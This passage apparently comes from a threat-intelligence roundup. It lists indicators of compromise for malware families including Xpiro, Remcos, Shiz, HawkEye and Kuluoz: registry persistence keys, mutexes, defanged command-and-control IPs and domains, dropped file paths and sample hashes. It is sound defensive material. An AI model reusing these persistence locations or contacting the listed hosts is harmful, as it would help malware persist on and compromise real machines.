<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: sc
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: expand
1
Mutexes Occurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF} 16
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
85[.]93[.]0[.]4 16
85[.]93[.]0[.]118 16
85[.]93[.]0[.]2/31 16
85[.]93[.]0[.]92/30 16
85[.]93[.]0[.]96/28 16
85[.]93[.]0[.]112/30 16
85[.]93[.]0[.]116/31 16
85[.]93[.]3[.]224/27 16
85[.]93[.]4[.]0/25 16
85[.]93[.]4[.]128/26 16
85[.]93[.]4[.]192/27 16
85[.]93[.]4[.]224/29 16
85[.]93[.]4[.]232/30 16
85[.]93[.]4[.]236/31 16
85[.]93[.]39[.]8/29 16
85[.]93[.]39[.]16/28 16
85[.]93[.]39[.]32/27 16
85[.]93[.]39[.]64/26 16
85[.]93[.]39[.]128/25 16
85[.]93[.]40[.]0/21 16
85[.]93[.]48[.]0/24 16
85[.]93[.]49[.]0/25 16
85[.]93[.]49[.]128/28 16
85[.]93[.]49[.]144/31 16
Files and or directories created Occurrences
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2} 16
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\fc.lnk 2
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\fc.exe 2
%System32%\Tasks\fc 2
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\ntoskrnl.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\ntoskrnl.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\WerFaultSecure.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\WerFaultSecure.exe 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\ndadmin.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\ndadmin.exe 1
%System32%\Tasks\ndadmin 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\grpconv.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\grpconv.exe 1
%System32%\Tasks\grpconv 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\sdchange.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\sdchange.exe 1
%System32%\Tasks\sdchange 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\at.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\at.exe 1
%System32%\Tasks\at 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\hh.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\hh.exe 1
%System32%\Tasks\hh 1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\javaws.lnk 1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\javaws.exe 1
*See JSON for more IOCs

File Hashes

13cb0416ecaedac2d05c117c68d7745d2f2ef8d2e41a5522ae28a9fdbe1cc464 18e9f9e0f0584b662165a2c78ca155ec06b59f48bfb09655929aaf6e4d3e04b6 273e649cfa2dba65d23094955a8901b2d8bcabd9d883eb53db97da09b2dc7257 37ce9b3d448b8d7ced3c71deebe8a826aa27095d155bbb08f5fe945edcaa665d 396c12c17e7de26873a87c37724b30ebeee8a246cb9f4dd8c81c4eb28e5a36ec 62e12d7f62c7c9826d8b20334d6bf5a9b9367cc92735c4c0ee0b9b04c68ebb30 636bb6784c21658f113ea4dcc00a82f0aa2c1e68927f3bb398d57ab5fcb6bc53 7017f1de73c8949efa7b04eb9973d73b712af738d2faf268cf32be7dea92b136 73fd26b7ee1d7939a55ee17a0ea15fc4a3aa85d417f9d19ec33230e71d21ac11 80574eb815087be8ead2c679474b8cf100a5a4db41cd3e012eff0c3e50ed900a 910aad5d8e14a47c2882531c587ceb7836af31e2c09296c43877a3ed2cc044e6 a340be1e9fe2140662c6bb04f1280eb91b1b1b1bd76c8e484ab4058ff25d5cf3 c41250c29a915060c509cb390c8dac68029067c1537707742ed211866ae2bff4 caba5cbc3931965b5f478934e02d20775413e15bcc559a684c632cfa9b151583 f6c4639bcabd34e8b2e9cf8323e07416a11bc4d579b910405880a8950128cfb1 fc73adec96749e88de8fb29777f1b4c27439c24690236857576076f545c8deb5

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Virus.Xpiro-9958895-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 37 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: HideSCAHealth
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32
Value Name: Type
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64
Value Name: Type
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32
Value Name: Type
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32
Value Name: Start
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\COMSYSAPP
Value Name: Type
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\COMSYSAPP
Value Name: Start
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE
Value Name: Type
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\IEETWCOLLECTORSERVICE
Value Name: Start
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE
Value Name: Type
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MOZILLAMAINTENANCE
Value Name: Start
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSISERVER
Value Name: Type
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSISERVER
Value Name: Start
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE
Value Name: Type
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\OSE
Value Name: Start
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\UI0DETECT
Value Name: Type
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\UI0DETECT
Value Name: Start
37
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\SYSTEM
Value Name: EnableSmartScreen
37
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500 37
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER\SVC\S-1-5-21-2580483871-590521980-3826313501-500
Value Name: EnableNotifications
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32
Value Name: Start
37
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64
Value Name: Start
37
<HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\STATE
Value Name: AccumulatedWaitIdleTime
37
<HKLM>\SOFTWARE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\LISTENEDSTATE
Value Name: RootstoreDirty
37
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\.NETFRAMEWORK\V2.0.50727\NGENSERVICE\STATE
Value Name: AccumulatedWaitIdleTime
37
Mutexes Occurrences
kkq-vx_mtx61 37
kkq-vx_mtx62 37
kkq-vx_mtx63 37
kkq-vx_mtx64 37
kkq-vx_mtx65 37
kkq-vx_mtx66 37
kkq-vx_mtx67 37
kkq-vx_mtx68 37
kkq-vx_mtx69 37
kkq-vx_mtx70 37
kkq-vx_mtx71 37
kkq-vx_mtx72 37
kkq-vx_mtx73 37
kkq-vx_mtx74 37
kkq-vx_mtx75 37
kkq-vx_mtx76 37
kkq-vx_mtx77 37
kkq-vx_mtx78 37
kkq-vx_mtx79 37
kkq-vx_mtx80 37
kkq-vx_mtx81 37
kkq-vx_mtx82 37
kkq-vx_mtx83 37
kkq-vx_mtx84 37
kkq-vx_mtx85 37
*See JSON for more IOCs
Files and or directories created Occurrences
%CommonProgramFiles%\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE 37
%CommonProgramFiles(x86)%\microsoft shared\Source Engine\OSE.EXE 37
%ProgramFiles(x86)%\Microsoft Office\Office14\GROOVE.EXE 37
%ProgramFiles(x86)%\Mozilla Maintenance Service\maintenanceservice.exe 37
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe 37
%SystemRoot%\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe 37
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe 37
%SystemRoot%\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe 37
%System32%\FXSSVC.exe 37
%System32%\UI0Detect.exe 37
%System32%\alg.exe 37
%System32%\dllhost.exe 37
%System32%\ieetwcollector.exe 37
%System32%\msdtc.exe 37
%System32%\msiexec.exe 37
%System32%\snmptrap.exe 37
%System32%\sppsvc.exe 37
%System32%\vds.exe 37
%SystemRoot%\ehome\ehrecvr.exe 37
%SystemRoot%\ehome\ehsched.exe 37
%SystemRoot%\Microsoft.NET\Framework\v2.0.50727\ngen_service.log 37
%SystemRoot%\Microsoft.NET\Framework64\v2.0.50727\ngen_service.log 37
%SystemRoot%\SysWOW64\dllhost.exe 37
%SystemRoot%\SysWOW64\msiexec.exe 37
%SystemRoot%\SysWOW64\svchost.exe 37
*See JSON for more IOCs

File Hashes

013aa31a250e2858846c6f078e12a5132abbc0fad271365d3b67527fa2c2f402 05c2e245c5f3a325472cf34f42093931e48d181c0f17caf9add2b35e7a3e828c 0aee33737e3213c74bb671a1ab7b9485e00ade57ade144e2be354f67506a7290 0af8855eff016554c3ddf0ce82bb61859ac3986ee4136ee06e7fe5d5a6d89788 0ca2f5ca6ce21bacf1b26601c214a36766a0c911320bec0c184b5a18923ece23 128d57cca2eae54f5754a5f1730a05df82d942a11764d0595e6c920498e9565f 1397eff74a13595ea3fcb206a76977d1447997680fdf81163c2b985a009b080c 13dd82a41add2789b1ea617cded11cf9bdbc143082372dcc2b26b2ae2616dbba 14e5e9016d589d815058b09845af3b2fc2781b9815a493499664f29e9832e9fa 16fcdd9f0950eda4799c80afd354767feefb725c58d82022c2d1385e25d48e96 1b0665bd149dd3b9ae9a3b19c7be06b5ddcd53da461f91cda65365b94b7a288b 1cf200ce049a09ea6f18ff56f65c651d519d6096d6eaf94331351c1217d2e002 1f98e6f12d028379751c4e5f6efe96e0fe8a286c7448513dda93c980e3d8acf6 26bd53dc56ec5c20627d67c8bdce2f67c3325bd6421a87319e3694abcf73867e 28664a444ff8d844816b801fcf92199100cad7375ebaedea96020b2f7e2c664b 290be865ff04b744f3f34e17cded589f11519cb10d5d186535cd5a21de8dd650 29e70dc26eb00d9ff16ed8864b2583dde97e70d6f7dc074c50f3665ad7f8b2dc 2c52d85ad0e41acf5112bccbbdde281950692c0e100e499a15b170d66d0154d0 30ed57cfe6626a3e05de88be3207d4524311c62a6a2b5647f9359a620ed22f11 3134096945a4cea5132ea9d0ad9b1a6925da40d2d4e86c8f8c8f4d3795b962ca 35f44b47ad1e072f2030291462cedd654234eb0575883ae8f8d5978c051d78e1 35fcd428c89e9586460cb2701ca4cb378824a32d497366a96fa234caf54d8048 3c8477fdcd2719855d6b38cf29849d36dca6bf90805f996286bf77fff7ba1fa3 3eb5cdb190ee1efbea012512c3ed6afd6215473bf208a1853f37701a3f7ba13a 3f53b25ccced470ef2b1eb2edb4b839099a0ca597f4dbcc3aa590b260d727ab0
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Remcos-9960040-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 21 samples
Registry Keys Occurrences
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: LanguageList
7
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}
Value Name: FaviconPath
2
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}
Value Name: Deleted
2
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES
Value Name: DefaultScope
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\STATS\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43} 2
<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\APPROVED EXTENSIONS
Value Name: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43}
2
<HKCU>\SOFTWARE\REMCOS-SFLVDU
Value Name: licence
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @C:\Windows\system32\DeviceCenter.dll,-2000
1
<HKCR>\LOCAL SETTINGS\MUICACHE\82\52C64B7E
Value Name: @explorer.exe,-7001
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: mea
1
<HKCU>\SOFTWARE\REMCOS-SFLVDU 1
<HKCU>\SOFTWARE\REMCOS-SFLVDU
Value Name: exepath
1
<HKCU>\SOFTWARE\REMCOS-1MSE40 1
<HKCU>\SOFTWARE\REMCOS-1MSE40
Value Name: exepath
1
<HKCU>\SOFTWARE\REMCOS-1MSE40
Value Name: licence
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Un9
1
<HKCU>\SOFTWARE\REMCOS-A21G8J 1
<HKCU>\SOFTWARE\REMCOS-A21G8J
Value Name: exepath
1
<HKCU>\SOFTWARE\REMCOS-A21G8J
Value Name: licence
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: re
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: dr
1
Mutexes Occurrences
Remcos_Mutex_Inj 3
Local\55C37268-60E9-964A-3299-E2046F3CC613 2
Remcos-SFLVDU 1
Remcos-1MSE40 1
Remcos-A21G8J 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
13[.]225[.]214[.]71 4
13[.]225[.]214[.]108 4
37[.]19[.]193[.]217 3
95[.]211[.]75[.]16 2
162[.]210[.]195[.]111 1
13[.]225[.]214[.]91 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
piloresi[.]top 7
dioneras[.]top 7
downloadmirror[.]intel[.]com 5
uniresio[.]top 4
emperimen[.]com 3
www[.]bing[.]com 2
busyboydesign[.]xyz 2
toptoptop2[.]site 1
toptoptop3[.]site 1
toptoptop3[.]online 1
toptoptop2[.]online 1
lutheatre[.]com 1
fallium[.]com 1
sheaffic[.]com 1
Files and or directories created Occurrences
%SystemRoot%\win.ini 21
%LOCALAPPDATA%\Administrator 8
%HOMEPATH%\kmm 1
%HOMEPATH%\kmm\Cam.exe 1
%HOMEPATH%\kmm\Cam.vbs 1
%HOMEPATH%\Dul\Slu6.exe 1
%HOMEPATH%\Dul\Slu6.vbs 1
%HOMEPATH%\Dul 1
%HOMEPATH%\Uds 1
%HOMEPATH%\Uds\sov.exe 1
%HOMEPATH%\Uds\sov.vbs 1
%HOMEPATH%\Sv9 1
%HOMEPATH%\Sv9\BUT.exe 1
%HOMEPATH%\Sv9\BUT.vbs 1
%HOMEPATH%\ref 1
%HOMEPATH%\ref\Bar.exe 1
%HOMEPATH%\ref\Bar.vbs 1
%HOMEPATH%\ma\No.exe 1
%HOMEPATH%\ma\No.vbs 1
%HOMEPATH%\ma 1
%HOMEPATH%\Oxy\Bru4.exe 1
%HOMEPATH%\Oxy\Bru4.vbs 1
%HOMEPATH%\tr\TEL.exe 1
%HOMEPATH%\tr\TEL.vbs 1
%HOMEPATH%\Oxy 1
*See JSON for more IOCs

File Hashes

1990701e4db9f573be94dbfd0e9edcb826c4a0ba858b42249812acb12cea572f 201ecff5a0b06b1401158972176bf3af310e1a25a9f603ea902b340f15262130 667fcc41313580c1c5dd3f74e84f13a4431a8b1daf4e1c60d5f3ab0c657e95ef 6754bcad108371e4192bc126187cf7ac07c39ea3f5ed7d975402a4c20d7fbcd4 68183c5baad715853bf2a38a2384288803a431ef4881be8c33b473f7e97d0186 6f70b508bcf39a1de4371f080c51bbf569ff5be7bf0f91793519c3c511710386 72d305998919d0c14d44659c0427e1130b9cf6539f386d328879c7d416ac085a 7cbbe9909fc023294a209ecf1b3882a02cb198d6841a129471201ce105c10d7f 905d2ba08aa3c839dfb815a373c5e2d0ae71badcbb1a70be1ef2683381dcb257 96eba5d5846bbcb803ffbac64ea5adf52fcb736ebda11abd466d509314dcc216 c2bfc250e5a0f8047d8eeb2bab36669e2d20becf57ddfa1e0ff5c33ff63864d5 cad62477913555b37902a162c9b437af27182fb219aa14647f257a0c48ddd556 d2a181619dc5bce7506d65bd893b411772de00c9ffdcbbcb9e3a78ab029a4997 d6e619e7f6f7578cef21ad4bea1ed94f397c0063aee69df329bc0aab3ea0b177 d9f6c0ffc135785c9c0355bad4cc4b8884f6f655c6e336c14b1b7a27568ddda9 dcd1f707b263fe1c37b94944b8399d92675d215d76aca304f0c7455250627d68 e9877a7c8d2daca6b15131b26a583695e4d5e2c05023b764f24a551666055b0a f22c91af53fd11dae4ebeeca1886c5a3355f68970cb554be7eb10affbb547341 f57f13ef3d153621588b9aa9a273e08a77069dd2b9b7d5ad08c579f24feedc41 f7ac5679a471bbc48cb5af2fd54ea2e4621f7e825c06fba59a1690fa6745e56f fd4de71e56062003053b8f93f6bb84188666361a07c415e56a4b015802237289

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint



Secure Malware Analytics



MITRE ATT&CK





Win.Dropper.Shiz-9958984-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 88 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\MICROSOFT
Value Name: 67497551a
33
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: 98b68e3c
33
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: userinit
33
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: System
33
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: load
33
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS
Value Name: run
33
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: userinit
33
Mutexes Occurrences
Global\674972E3a 33
Global\MicrosoftSysenterGate7 33
internal_wutex_0x000000e0 33
internal_wutex_0x0000038c 33
internal_wutex_0x00000448 33
internal_wutex_0x<random, matching [0-9a-f]{8}> 29
internal_wutex_0x000007d0 12
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
13[.]107[.]21[.]200 16
45[.]33[.]23[.]183 9
96[.]126[.]123[.]244 8
198[.]58[.]118[.]167 7
45[.]56[.]79[.]23 6
45[.]33[.]30[.]197 6
45[.]79[.]19[.]196 5
173[.]255[.]194[.]134 5
72[.]14[.]178[.]174 5
72[.]14[.]185[.]43 4
45[.]33[.]2[.]79 3
45[.]33[.]18[.]44 3
45[.]33[.]20[.]235 2
85[.]94[.]194[.]169 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
fodakyhijyv[.]eu 33
qekusagigyz[.]eu 33
maxyjofytyt[.]eu 33
xudylenyrob[.]eu 33
pufepepazyd[.]eu 33
vopibycywow[.]eu 33
fotoxysupyd[.]eu 33
gaqehysohec[.]eu 33
lyxaxududes[.]eu 33
rycovuvutiq[.]eu 33
kevimudyqec[.]eu 33
jewidonevin[.]eu 33
tulekuvigij[.]eu 33
vocupotusyz[.]eu 33
galavozaxog[.]eu 33
divufozutog[.]eu 33
kefidaxupif[.]eu 33
jejykaxymob[.]eu 33
xutevexecif[.]eu 33
puryxepenek[.]eu 33
lysowaxojib[.]eu 33
dimigesupew[.]eu 33
fobatesohek[.]eu 33
ryhadyvigis[.]eu 33
qekikyvutic[.]eu 33
*See JSON for more IOCs
Files and or directories created Occurrences
%TEMP%\<random, matching [A-F0-9]{1,4}>.tmp 33

File Hashes

0426a2801b985679944d7956d57df0c195e4871cb5fa9ae5d3cb864600883613 06748264e401a4fcf30a802df0f390a75a14a3ff6148b8f064ee3e2585c742d9 09bf6eb80568c5d370d52e77ca1eddea41f0eb7e458549c994620b3e6af3967c 0affbf8c7691eaaab70491418b6db92cced36ff4a0a482673a4ebdd5492ad6c8 0fbe21b7ff8392a707d0d871494c2298e88e723ebcd7a4495c6a037232d4899b 11b3839df1c31d6c2f15591a0fa013c8b41862dd522d106c85876b49e7d561c0 11b6cfd9b8f56c8107511151282335f7b5f5d555665bec7506908515dcb6acab 11c19ec5a341f6a6bfa86170ea383439466f008ff42ec6dc04bd0445a658ba63 1641e6a92c47304c11521b9c875029a387e49b511438b3ac4c122ee7b14519de 1cac14ca2ad5715132446d1bb0503a6f783577d15f8fb97611dac9b7177903cc 1f4e2901cf95c9ca682d9e5c24235c11da57a47153969203e58b5528bd37b411 1f83440aab9dc62a6c4726b35ee58355b1cf76d23d194250397069423b17d281 237bf6bd91b6301dd01456859507771ed5fc2eda62f67e207bea6928f69573b9 253dc24fa6384c2c2757acc74ecfb88a231ab434c718e5b044a47e3fec4515f7 25525b728590f243275c528727c4887c3521fc16c25f60e3b364fb21e8b64dab 2553d02ff7f59fc5e0830783a508b4a5e8daff585bb4e5411c49bb34217f1b3d 259d0e1eb7a6ab82cfef210054b7cedd069d331455d6c0effff450c514fef6b1 2796098904f867adffd735f528461e5fb8be9f33ebd22bc37fb58684c3476112 27de5dc0ae67097bc22a0bcb3381dcebc372c469c4b8effe2b83d87f85f01cc1 2a6f60367dc3d70d2db9926e28dba4d79f20e319ceaf839c094cf85c9850c99a 2c729b76866357b2fae9d51f4d5f69c1554b18b5be35f896300631b7409e49e7 319155806bbb3e74cc753ed768a13455965e1fa7a175155f5862c2e030c2e35a 34b2879998dfd238977cf19e5f4e3d4cbccfa61a9b0688e43a569e19a75a2844 3578be24b2fe30600747846c30c1e286622e1906fce1a801e10b87117bf37ef4 385ddefdb0c298b4cd194b165f82e9ddec8c8e6616160e432125e576dae5603c
*See JSON for more IOCs

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint (image not included)

Secure Malware Analytics (image not included)

MITRE ATT&CK (image not included)


Win.Dropper.HawkEye-9959777-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: Hidden
11
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Update
10
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Shell
5
<HKCU>\SOFTWARE\[email protected] 3
<HKCU>\SOFTWARE\[email protected]
Value Name: NewIdentification
3
<HKCU>\SOFTWARE\[email protected]
Value Name: NewGroup
3
<HKCU>\SOFTWARE\[email protected]
Value Name: FirstExecution
3
Mutexes Occurrences
<random, matching '[A-Z0-9]{14}'> 4
X43238C48CI4NY_SAIR 1
M21V21V8G7Q66R_SAIR 1
05V015TT37XDUJ_SAIR 1
Global\07657600-129e-11ed-9660-0015174b6151 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
104[.]16[.]155[.]36 6
104[.]16[.]154[.]36 5
77[.]88[.]21[.]158 2
142[.]251[.]16[.]109 2
208[.]91[.]199[.]224 1
208[.]91[.]198[.]143 1
208[.]91[.]199[.]223 1
192[.]99[.]212[.]64 1
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
whatismyipaddress[.]com 11
kalashas[.]no-ip[.]biz 3
smtp[.]gmail[.]com 2
smtp[.]yandex[.]ru 2
mail[.]siliconsss[.]com 2
smtp[.]impexservicesindia[.]com 2
smtp[.]vsnl[.]net 1
smtp[.]thanawalagroup[.]net 1
Files and or directories created Occurrences
%APPDATA%\pid.txt 11
%APPDATA%\pidloc.txt 11
%TEMP%\holdermail.txt 10
%APPDATA%\WindowsUpdate.exe 10
\Sys.exe 3
\autorun.inf 3
E:\autorun.inf 3
%TEMP%\Administrator7 3
%TEMP%\Administrator8 3
%TEMP%\Administrator2.txt 3
\directory 3
\directory\CyberGate 3
\directory\CyberGate\install 3
\directory\CyberGate\install\server.exe 3
%APPDATA%\Administratorlog.dat 3
%TEMP%\SysInfo.txt 3
%APPDATA%\Windows Update.exe 3
E:\Sys.exe 3
%System32%\drivers\etc\hosts 1
%TEMP%\oUK6NMZIZls5Ku6i.exe 1
%APPDATA%\6tOsSNNvNp7JOgxS 1
%APPDATA%\g3h44Njnele2nJzi 1
%APPDATA%\g3h44Njnele2nJzi\ZOqlaWVQEXMz.exe 1
%APPDATA%\6tOsSNNvNp7JOgxS\ChSV1JzLaHOS.exe 1
%APPDATA%\hAtRUbl2c5ywfar3 1
*See JSON for more IOCs

File Hashes

04e516d05c22e5489ba47b5e1bd03f6cb8bcf2b084e2b3dae23acbe25d4b4591 21e52c431fce5ea651800127be440f447fafd20c3d74f34b0d712e140b0c138d 21e949c72bc90a7b4647b305dd306e343f732ad2b898dba5e9b920edc33fc9a0 220c6f3ffe28c8c7cd3f3b669b47bccdde30b200ab1de9bd0cca55c475ad62cb 2f656303daecf2322749ed2a4b69b7124433dfea94d658c9e1e18d415db16456 32a841f8eaf7fa85d3c78469a9890988c1c9b90c97cfba674ac8f9f991bd3a94 4000b5bce992bdbdd73174fbe1e8d9b0fd65ad6c88f282889a8604dfa9fe0f59 5291c5d0bd7eaee2402fb660be1b8501c3a712471e9d66062b6728794909263a 5393c5a558225a02a03ee8ea46968d53a72b57194261e17dc7e35f0bd9b630ea 628eb845ab8309303d0ebb7448063dbafd36954a66596977a272d5806cacaeca 656d25151b846944e11c7ba03ce4fae066f7a8c29cdce84d0b241d4305a4245c 6d155125192252b756c6af33bca25810ab9a19be347e5793b534802662eb00a4 9a8797b6c2753e70ce0888185473510f40d3c0ff45b81b639dc8c077cb3679ec ad52ce9456cb87f713ad43de89835e0c882fd3a77389bb41ab50396efd59088a c4bf7dbe799d71e8e16c1aa5ca3f3af04f174b91e1a357a02e38b0155a46a600

Coverage

Product Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint (image not included)

Secure Malware Analytics (image not included)

MITRE ATT&CK (image not included)


Win.Worm.Kuluoz-9959792-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\<random, matching '[a-zA-Z0-9]{5,9}'> 26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: uecguckk
1
<HKCU>\SOFTWARE\AEAKVJGE
Value Name: ujaduqcw
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: cuhmadmx
1
<HKCU>\SOFTWARE\UDVFKDFC
Value Name: vdqcxwxs
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: lhelwsfg
1
<HKCU>\SOFTWARE\SFLQPFKG
Value Name: pvgxfqel
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: wrbmmivh
1
<HKCU>\SOFTWARE\SMXPKGUG
Value Name: cdjmiong
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: agokwqgv
1
<HKCU>\SOFTWARE\NGWWUMBN
Value Name: fpesjwgk
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: bomrkrmk
1
<HKCU>\SOFTWARE\LSCPUEQM
Value Name: lsekxadg
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: bxvvsgvr
1
